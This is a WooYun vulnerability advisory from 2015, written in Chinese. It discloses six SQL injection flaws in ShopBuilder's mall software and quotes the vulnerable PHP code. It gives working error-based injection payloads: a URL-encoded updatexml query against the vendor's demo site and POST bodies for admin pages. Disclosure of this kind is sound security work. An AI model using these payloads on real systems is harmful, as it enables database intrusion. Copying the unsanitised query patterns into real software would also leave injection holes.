当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112688

漏洞标题:ShopBuilder网上商城六处sql注入打包(demo成功)

相关厂商:shop-builder.cn

漏洞作者: 路人甲

提交时间:2015-05-19 11:48

修复时间:2015-08-17 15:52

公开时间:2015-08-17 15:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-22: 细节向第三方安全合作伙伴开放
2015-07-13: 细节向核心白帽子及相关领域专家公开
2015-07-23: 细节向普通白帽子公开
2015-08-02: 细节向实习白帽子公开
2015-08-17: 细节向公众公开

简要描述:

打包提交,不刷洞。

详细说明:

注入1
看到
\module\vote\index.php

include_once("includes/global.php");
include_once("includes/smarty_config.php");
//=========================================
if($_GET['t']=="sp")
{
$sql="select * from ".SPE." where id='$_GET[cid]'";
$db->query($sql);
$de=$db->fetchRow();
$title=$de['name'];
$tit="<a href='$config[weburl]/?m=special&s=spd&name=$de[file_name]'>$title</a>";
$votes=$_GET['id'];
}
else
{
if(!empty($_GET['id']))
{
$sql="SELECT ftitle,title,nid,vote FROM ".NEWSD." WHERE nid='$_GET[id]'";
$db->query($sql);
$de=$db->fetchRow();
$title=$de['title'];
if(!empty($de['ftitle']))
$title=$de['ftitle'];
$tit="<a href='$config[weburl]/?m=news&s=newsd&id=$de[nid]'>$title</a>";
$votes=substr($de['vote'],0,-1);

}
elseif(!empty($_GET['vid']))
{
$title="调查结果";
$tit="";
$votes=$_GET['vid'];
}
}
$sql="select * from ".NEWSVOTE." where id in ($votes)";
$db->query($sql);
$vote=$db->getRows();


$votes无单引号包裹。可以直接注入。
构造

http://democn.shop-builder.cn/?m=vote&s=index&vid=1%20and%20%75%70%64%61%74%65%78%6D%6C%28%32%2C%63%6F%6E%63%61%74%28%30%78%37%65%2C%28%76%65%72%73%69%6F%6E%28%29%29%29%2C%30%29


因为有个防护函数,所以要url编码。

35.png


直接出数据。
#########################################################################
注入2
看到module\adv\admin\adv.php

if($_GET['delid'])
{
$sql="delete from ".ADVSCON." where id='$_GET[delid]'";
$db->query($sql);
unset($_GET['delid']);
unset($_GET['s']);
unset($_GET['m']);
$getstr=implode('&',convert($_GET));
msg("?m=adv&s=adv.php&$getstr");
}
if($_POST['act']=='op')
{
if($_POST['chk'])
{
$id=implode(",",$_POST['chk']);
$sql="delete from ".ADVSCON." where ID in ($id)";
$db->query($sql);

$getstr=implode('&',convert($_GET));
msg("?m=adv&s=adv.php&$getstr");
}
}
$sql="select ID,`name` from ".ADVS." order by id ";
$db->query($sql);
$re=$db->getRows();
$tpl->assign("re",$re);


$id无单引号保护直接进入sql中,造成注入。
构造

http://democn.shop-builder.cn//main.php?m=adv&s=admin/adv&operation=ads


然后post数据

act=op&chk[]=1) or updatexml(1,concat(0x5c,user()),1)%23


36.png


注入3
#########################################################################
module\adv\admin\audit.php

include_once("../includes/page_utf_class.php");
//==========================================
if(!empty($_POST["action"])&&$_POST["action"]==lang_show('delete'))
{
if(isset($_POST["de"]) && is_array($_POST["de"]))
{
$id=implode(",",$_POST["de"]);
if($id)
$db->query("update ".ADVSCON." set statu='-2' where id in ($id) and statu=-1");
}
}


也是一样可以注入,不演示了。
注入4
#########################################################################
\module\announcement\admin\announcement.php

else
{
//删除公告
if($_GET['delid'])
{
$db->query("delete from ".ANNOUNCEMENT." where id='$_GET[delid]'");
unset($_GET['delid']);
unset($_GET['s']);
unset($_GET['m']);
$getstr=implode('&',convert($_GET));
msg("?m=announcement&s=announcement.php&$getstr");
}
if($_POST['act']=='op')
{
if(is_array($_POST['chk']))
{
$id=implode(",",$_POST['chk']);
$sql="delete from ".ANNOUNCEMENT." where id in ($id)";
$db->query($sql);
foreach($_POST['chk'] as $list)
{
$db->query("update ".PRO." set promotion_id=0 where promotion_id='$list'");
}
}
if($_POST['displayorder'])
{
foreach($_POST['displayorder'] as $key=>$list)
{
$db->query("update ".ANNOUNCEMENT." set displayorder='$list' where id='$key'");
}
}
msg("?m=announcement&s=announcement.php");
}


同样id可以注入。
构造url

http://democn.shop-builder.cn//main.php?m=announcement&s=admin/announcement


post数据

act=op&chk[]=1) or updatexml(1,concat(0x5c,user()),1)%23


注入5
#########################################################################
module\brand\admin\brand_cat.php

if($_POST['act']=='op')
{
if($_POST['submit']==$lang['btn_submit'])
{
if(is_array($_POST['chk']))
{
$id=implode(",",$_POST['chk']);
$sql="delete from ".BRANDCAT." where id in ($id)";
$db->query($sql);
$sql="delete from ".BRANDCAT." where parent_id in ($id)";
$db->query($sql);
}
if($_POST['displayorder'])
{
foreach($_POST['displayorder'] as $key=>$list)
{
$db->query("update ".BRANDCAT." set displayorder='$list' where id='$key'");
}
}
}
msg("?m=brand&s=brand_cat.php");
}
}


然后构造

http://democn.shop-builder.cn//main.php?m=brand&s=admin/brand_cat


post数据

act=op&chk[]=1) or updatexml(1,concat(0x5c,user()),1)%23


注入6
#########################################################################
module\brand\admin\brand.php

if($_GET['delid'])
{
$sql="delete from ".BRAND." where id='$_GET[delid]'";
$db->query($sql);
unset($_GET['delid']);
unset($_GET['s']);
unset($_GET['m']);
msg("?m=brand&s=brand.php$getstr");
}
if($_POST['act']=='op')
{
if($_POST['submit']==$lang['btn_submit'])
{
if(is_array($_POST['chk']))
{
$id=implode(",",$_POST['chk']);
$sql="delete from ".BRAND." where id in ($id)";
$db->query($sql);
}
if($_POST['displayorder'])
{
foreach($_POST['displayorder'] as $key=>$list)
{
$db->query("update ".BRAND." set displayorder='$list' where id='$key'");
}
}
}

漏洞证明:

36.png


35.png

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-05-19 15:52

厂商回复:

非常感谢

最新状态:

2015-05-25:已修复